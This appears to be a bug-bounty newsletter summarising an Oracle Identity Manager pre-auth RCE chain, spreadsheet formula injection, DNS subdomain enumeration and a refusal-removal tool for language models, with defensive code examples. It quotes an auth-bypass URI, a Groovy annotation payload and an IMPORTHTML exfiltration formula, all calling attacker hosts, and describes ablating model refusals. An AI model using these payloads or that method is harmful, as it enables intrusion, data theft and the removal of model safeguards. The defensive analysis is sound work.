[HackerNotes Ep. 150] ASP.NET MVC Patterns, Popping Oracle Identity, and Truly Lesser-known Subdomain Enumeration Techniques
In this episode: we're highlighting some cool news and research, but not before expressing our gratitude to the Hacker community. We are so thankful for you all!
Hacker TL;DR
Breaking Oracle’s Identity Manager: Pre-Auth RCE (CVE-2025-61757): Global SecurityFilter rules in web.xml using a .wadl regex on getRequestURI() could be bypassed with matrix params like ;.wadl, exposing unauthenticated access to OIM’s REST APIs. Hitting the Groovy script compilation endpoint and abusing annotation execution at compile-time turns a “non-executing” compiler into a pre-auth RCE primitive.
Formula payloads like =IMPORTHTML("https://{id}.attacker.com/log?v=" & CONCATENATE(A1:E1), "table", 1) only execute once user-controlled data reaches Google Sheets via CSV exports or automations, not at ingestion. Any path that can land unescaped =-prefixed text in a spreadsheet should be treated as a blind, delayed execution surface.
Lesser known techniques for large-scale subdomain enum: Empty Non-Terminals returning NOERROR/NODATA reveal which DNS branches are alive and worth deeper probing, while NSEC/NSEC3 records plus tools like ldns-walk and nsec3map enable zone reconstruction. ICANN CZDS zone files for gTLDs give you entire TLD maps up front.
Heretic - Fully automatic censorship removal for language models: Heretic uses Optuna to find weight tweaks that make the model refuse less on “harmful” prompts while keeping its answers on normal prompts very close to the original.
With ThreatLocker® Elevation Control, you eliminate unnecessary admin rights without slowing anyone down.
Traditional privilege management forces users into full admin accounts or constant credential prompts. Elevation Control replaces that chaos with application-centric, policy-driven control that gives IT teams precision and keeps attackers locked out.
✓ Remove local admin rights from users without breaking workflows
✓ Elevate only the applications that need it — not the user
✓ Granular, policy-based elevation by app, user, group, or device
✓ “Just-in-time” elevation with automatic expiry
✓ Integrated approval workflows and UAC replacement for seamless requests
Keep users productive while cutting off one of the most abused attack surfaces in the enterprise.
Start taking back control, one application at a time.
HACKERNOTES;
The episode started with Rhyno and rez0 talking about Thanksgiving, so it felt like a good moment to drop a quick note here too.
The CTBB team really appreciates every single one of you who keep reading HackerNotes, watching the pod, sharing research, helping each other, keeping the community alive and interesting.
Everything we’ve built only works because people like you show up, contribute, and make this space actually worth being in.
Thanks for being here with us and pushing the whole thing forward!
If you’re thankful for something you want to share, send a message in the #pod-talk channel!
— Breaking Oracle’s Identity Manager: Pre-Auth RCE (CVE-2025-61757)
Searchlight Cyber’s research into CVE-2025-61757 shows a full pre-auth RCE chain inside Oracle Identity Manager. Once they extracted the OIM source (a maze of EARs → WARs → JARs), they anchored themselves by searching for known UI paths like identity/faces/helppages/main.jspx and worked inward from there.
The dangerous surface came from OIM’s REST management APIs. Many endpoints looked unauthenticated in code but returned 401. The mismatch came from a classic enterprise Java anti-pattern: a global SecurityFilter defined in web.xml, not attached to individual routes. These filters rely on brittle regex whitelists rather than route-level auth. The simplified key rule: WADL_PATTERN = /\.wadl.*$/i
If the request URI matched .wadl, the filter let the request through. Because getRequestURI() includes path parameters, appending a matrix param—rather than a query param—bypassed auth cleanly: /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl
With the filter bypassed, the most interesting target was the Groovy script compilation endpoint. It compiles user-controlled Groovy, but doesn’t execute it. The trick is recognizing that Groovy sits on top of Java, and Java annotation processors execute at compile time, outside the runtime’s security model.
By embedding an annotation like:
@ASTTest(phase = SEMANTIC_ANALYSIS, value = {
    new URL("https://attacker").openConnection().getInputStream()
})
The annotation’s code executes during Groovy’s compilation phase — giving full outbound-capable RCE.
In short, the chain is:
1. Central SecurityFilter → .wadl regex → path parameter → full auth bypass
2. Reach Groovy compilation endpoint
3. Inject annotation-based code → executed during compile → pre-auth RCE
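To make the filter flaw concrete from the defender's side, here is an added example (my code, not Searchlight Cyber's or Oracle's) that puts the brittle allowlist rule beside a hardened check that canonicalises the path before matching, and then scans constructed access-log lines for the matrix-parameter pattern. The bypass URI is the one quoted above; the application.wadl path, the log lines and all function names are assumptions made for the example.

```python
"""URI-regex allowlists vs matrix parameters: brittle rule, hardened check,
and an access-log scan. Added example; not Oracle's code nor the research
team's. Log lines and the application.wadl path are constructed."""
import re

# Simplified rule quoted in the write-up: any request URI that contains
# ".wadl" is treated as a harmless WADL document fetch and skips auth.
WADL_PATTERN = re.compile(r"\.wadl.*$", re.IGNORECASE)

# Bypass URI quoted in the write-up: ';.wadl' is a matrix parameter, so the
# container still routes to groovyscriptstatus, but getRequestURI() keeps it.
BYPASS_URI = ("/iam/governance/applicationmanagement/api/v1/applications/"
              "groovyscriptstatus;.wadl")


def brittle_allows(request_uri: str) -> bool:
    """Filter that matches the raw request URI, matrix parameters included."""
    return WADL_PATTERN.search(request_uri) is not None


def canonical_path(request_uri: str) -> str:
    """Strip the query string and every matrix parameter (';...') from each
    path segment, giving the path the servlet container actually routes on."""
    path = request_uri.split("?", 1)[0]
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def hardened_allows(request_uri: str) -> bool:
    """Only a canonical path whose last segment really ends in .wadl passes.
    (The real fix is route-level auth; this only closes the regex hole.)"""
    last_segment = canonical_path(request_uri).rsplit("/", 1)[-1]
    return last_segment.lower().endswith(".wadl")


# Detection: a legitimate WADL fetch never needs a matrix parameter that
# carries the .wadl suffix, so ';<anything>.wadl' in a request line is a
# high-signal indicator of a bypass attempt against this kind of filter.
MATRIX_WADL = re.compile(r";[^/\s]*\.wadl", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS)\s+(\S+)\s+HTTP/')


def suspicious_requests(log_lines):
    """Return the request URIs from combined-format access-log lines that
    smuggle .wadl inside a matrix parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if m and MATRIX_WADL.search(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed access-log lines for the scan; IPs and timestamps are fake.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Nov/2025:10:00:01 +0000] "GET /iam/governance/'
    'applicationmanagement/api/v1/applications/application.wadl HTTP/1.1" 200 4512',
    '10.0.0.9 - - [20/Nov/2025:10:00:07 +0000] "GET ' + BYPASS_URI + ' HTTP/1.1" 200 88',
    '10.0.0.9 - - [20/Nov/2025:10:00:08 +0000] "POST /iam/governance/'
    'applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    print("brittle allows bypass:", brittle_allows(BYPASS_URI))    # True
    print("hardened allows bypass:", hardened_allows(BYPASS_URI))  # False
    print("canonical path:", canonical_path(BYPASS_URI))
    print("flagged requests:", suspicious_requests(SAMPLE_LOG))
```

The hardened check only removes one way of fooling a URI regex; anything that still decides auth by pattern-matching the URI stays fragile (encoding tricks, dot segments), which is why the write-up's underlying point is that the filter should not be the thing deciding which routes are public at all.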
hx01, Sajeeb, and Eric (Todayisnew) took a closer look at something most workflows take for granted: how spreadsheets handle untrusted text. Their test payload used Google Sheets’ IMPORTHTML():
=IMPORTHTML("https://{subdomain-with-payload-id}.our-server.com/log?v=" & CONCATENATE(A1:E1), "table", 1)
Each submission got its own {subdomain-with-payload-id}. When the formula eventually executed inside Google Sheets, Sheets sent an HTTP request to that unique subdomain, with v= set to CONCATENATE(A1:E1) (a fingerprint of the header row). That proved execution, timing, and basic sheet structure — without touching actual user data.
The important part: nothing happened at ingestion. Email and form submissions alone did nothing. Execution only occurred later when internal workflows pushed the data into Sheets:
Employees exporting CSVs from CRMs like Salesforce, Zendesk, HubSpot and then uploading them into Sheets.
Automation tools like Zapier, Workato, or custom integrations inserting rows directly into Sheets.
From there they saw callbacks across support pipelines, privacy tracking, advertising intake, membership onboarding, and even a bug bounty live hacking event intake form wired straight into a spreadsheet.
The behaviour is Blind-XSS-like: delayed, blind execution somewhere deep in the org. But there’s no browser or DOM — the execution environment is Google Sheets interpreting values that start with =.
The core lesson from the research is blunt: if user-controlled text can land in a spreadsheet without formula escaping, assume it can execute. And because these CSV → Sheets flows are usually built by non-technical teams via CRMs and no-code tools, they almost never get treated as part of the attack surface.
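An added example of the defensive side of this (my code, not the researchers'): neutralising formula-triggering cells before they reach a CSV export, and auditing an existing export for cells a spreadsheet would execute on import. The ticket rows and the export text are constructed sample data; the payload is the one quoted above with the per-submission subdomain collapsed to {id}.

```python
"""Neutralise and audit spreadsheet-formula cells in CSV exports.
Added example; not code from the research above. The ticket rows and the
export below are constructed sample data."""
import csv
import io

# Leading characters that Google Sheets / Excel read as a formula (or, for
# tab and carriage return, as a cell boundary). This follows OWASP's CSV
# injection guidance; leading spaces are stripped first so " =1+1" is caught.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True when a spreadsheet would interpret the cell as a formula."""
    stripped = value.lstrip(" ")
    return stripped != "" and stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(value: str) -> str:
    """Prefix a single quote so the cell is stored as literal text.
    Other cells are returned unchanged, so plain numbers stay numbers;
    values starting with '+' or '-' (phone numbers, negatives) are
    quoted too, so type those columns explicitly rather than as free text."""
    return "'" + value if is_formula_like(value) else value


def safe_csv(rows) -> str:
    """Serialise rows with every cell neutralised and RFC 4180 quoting, so a
    later CSV parse cannot re-split a field on an embedded comma or newline."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


def audit_csv(text: str):
    """Scan an existing export and return (row, col, value) for every cell a
    spreadsheet would execute on import. Rows and columns are 1-based."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Payload quoted in the research, with the per-submission subdomain as {id}.
PAYLOAD = ('=IMPORTHTML("https://{id}.our-server.com/log?v=" '
           '& CONCATENATE(A1:E1), "table", 1)')

# Constructed support-ticket rows as a CRM would hand them to an export job.
SAMPLE_ROWS = [
    ["ticket_id", "email", "subject", "body"],
    ["1001", "alice@example.com", "Login issue", "Cannot sign in"],
    ["1002", "mallory@example.com", PAYLOAD, "see subject"],
]

# The same data as a raw CRM export (no escaping), i.e. what an employee
# would upload into Sheets. Embedded quotes are doubled per RFC 4180.
SAMPLE_EXPORT = (
    "ticket_id,email,subject,body\n"
    "1001,alice@example.com,Login issue,Cannot sign in\n"
    '1002,mallory@example.com,"=IMPORTHTML(""https://{id}.our-server.com/log?v="" '
    '& CONCATENATE(A1:E1), ""table"", 1)",see subject\n'
)

if __name__ == "__main__":
    print("findings in raw export:", audit_csv(SAMPLE_EXPORT))
    print("findings after neutralising:", audit_csv(safe_csv(SAMPLE_ROWS)))
```

The audit function is the part worth wiring into the CSV → Sheets flows the research describes: run it on the export the CRM produced, or on the rows an automation is about to insert, and treat any finding as the same class of event as a blind-XSS callback, since the cell will execute wherever the sheet is eventually opened.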
We got quite a few new things over at the Critical Research Lab.
FSI dropped research on ASP.NET MVC View Engine Search Patterns, and 7urb0 is posting an XSS miniseries that will finish next Monday, so stay tuned!
Direct links:
And if you have something cool to share, please check the official page to learn how to submit your research!

— Heretic - Fully automatic censorship removal for language models
Heretic builds on recent “abliteration” work and pushes it further, aiming to remove refusals while keeping the model as close as possible to its original quality.
It automates the whole process using directional ablation plus a parameter optimiser powered by Optuna.
It optimises two metrics at the same time:
Reduce refusals for harmful prompts
Minimise divergence from the original model on harmless prompts
— Lesser known techniques for large-scale subdomain enum
1. ENTs & NOERROR
DNS has a middle state most enum tools ignore: Empty Non-Terminals, nodes with no records of their own but with existing descendants.
They return NOERROR/NODATA instead of NXDOMAIN, which silently reveals deeper hierarchy:
It tells you which branches actually lead somewhere
It exposes hidden subtrees where MX/TXT/SRV/CNAME records may live
It prevents wasting time fuzzing dead paths
2. NSEC / NSEC3 Zone Walking
Classic NSEC DNSSEC records act like a linked list: each record points to the next valid name in the zone, which makes full enumeration trivial via tools like ldns-walk.
Modern NSEC3 hides names by hashing, but the hashes are still collectible and crackable offline:
Query random non-existent names → collect hashed labels
Use tools like nsec3map to brute-force or look up those hashes
Reconstruct the zone structure without direct NSEC leaks
3. ICANN CZDS
ICANN’s Centralized Zone Data Service hands out full zone files for hundreds of participating gTLDs.
If a target uses a niche or vanity gTLD, you can often pull:
Every domain under that TLD
All second-level names
Immediate enumeration starting points
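As an added example (my code, not from the notes above nor from ldns-walk or nsec3map), here is an offline model of points 1 and 2 on a constructed zone: a classifier that shows why an Empty Non-Terminal answers NODATA rather than NXDOMAIN, a branch check that keys on that difference, and a walk over a constructed NSEC chain showing how much of the zone its own records disclose. The zone contents, the chain and the function names are assumptions; a real audit would query the authoritative servers instead of an in-memory map.

```python
"""Empty Non-Terminals and NSEC chains, modelled on a constructed zone.
Added example; not from the podcast notes, ldns-walk or nsec3map. The zone
and the NSEC chain below are constructed; a real audit would query the
authoritative servers instead of an in-memory map."""

# Constructed zone: owner name -> record types present at that name.
# "_tcp.example.com." has no records of its own but "_sip._tcp" exists
# beneath it, so it is an Empty Non-Terminal: the server must answer
# NOERROR with an empty answer (NODATA), never NXDOMAIN (RFC 8020).
ZONE = {
    "example.com.": {"SOA", "NS", "MX"},
    "www.example.com.": {"A"},
    "mail.example.com.": {"A"},
    "_sip._tcp.example.com.": {"SRV"},
}


def classify(zone, qname, qtype="A"):
    """Response state an authoritative server gives for (qname, qtype):
    'NOERROR' with data, 'NODATA' (NOERROR, empty answer) or 'NXDOMAIN'."""
    qname = qname.lower()
    if qname in zone:
        return "NOERROR" if qtype in zone[qname] else "NODATA"
    # A name with any existing descendant exists as an ENT.
    if any(owner.endswith("." + qname) for owner in zone):
        return "NODATA"
    return "NXDOMAIN"


def alive_branches(zone, parent, labels, qtype="A"):
    """Map each candidate label under parent to its response state, keeping
    only branches that exist; ENTs show up as NODATA and mark subtrees
    worth probing even though no record lives at the name itself."""
    states = {label: classify(zone, f"{label}.{parent}", qtype) for label in labels}
    return {label: st for label, st in states.items() if st != "NXDOMAIN"}


# Constructed NSEC chain in canonical order: owner -> next owner. ENTs carry
# no RRsets and therefore get no NSEC record, so "_tcp.example.com." is
# absent; the apex record simply points past it to the next real owner.
NSEC_CHAIN = {
    "example.com.": "_sip._tcp.example.com.",
    "_sip._tcp.example.com.": "mail.example.com.",
    "mail.example.com.": "www.example.com.",
    "www.example.com.": "example.com.",
}


def nsec_walk(chain, apex):
    """Follow 'next name' pointers from the apex until the chain wraps back,
    returning every owner name the zone's own NSEC records disclose. This is
    the linked-list property ldns-walk relies on; NSEC3 replaces the names
    with hashes, which is why walking it needs the offline cracking step."""
    names, current = [], apex
    for _ in range(len(chain) + 1):
        names.append(current)
        current = chain[current]
        if current == apex:
            return names
    raise ValueError("NSEC chain does not close back on the apex")


if __name__ == "__main__":
    print(alive_branches(ZONE, "example.com.", ["www", "_tcp", "dev", "mail"]))
    print(nsec_walk(NSEC_CHAIN, "example.com."))
```

Read from the defender's side, the two functions answer two audit questions: does our authoritative server correctly return NODATA for ENTs (a server that returns NXDOMAIN there breaks resolvers doing RFC 8020 negative caching), and, if we sign with plain NSEC, how much of the zone can anyone reconstruct from the chain alone.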
— Gemini 3 and Antigravity
Google dropped Gemini 3 during the same week with unusually large benchmark jumps compared to the model-to-model incremental improvements of the last year. You can run it free at AI.dev with “thinking” enabled.
Alongside the model release, Google relaunched the Windsurf code-generation environment as Antigravity, a VS Code fork with full agentic code editing capabilities, free for now.
AssetNote’s original Surf takes a domain list, probes for reachable hosts, and outputs all non-HTTP/S-addressable hosts.
Justin and Émile rewrote the functionality as a plugin for Caido!

Our friend Vitor (busfactor) created a page that works like a reading list of hacking-related articles he finds around.
If you’re like us and like reading cool things in your free time, check out his page!
That’s it for the week,
and as always, keep hacking!
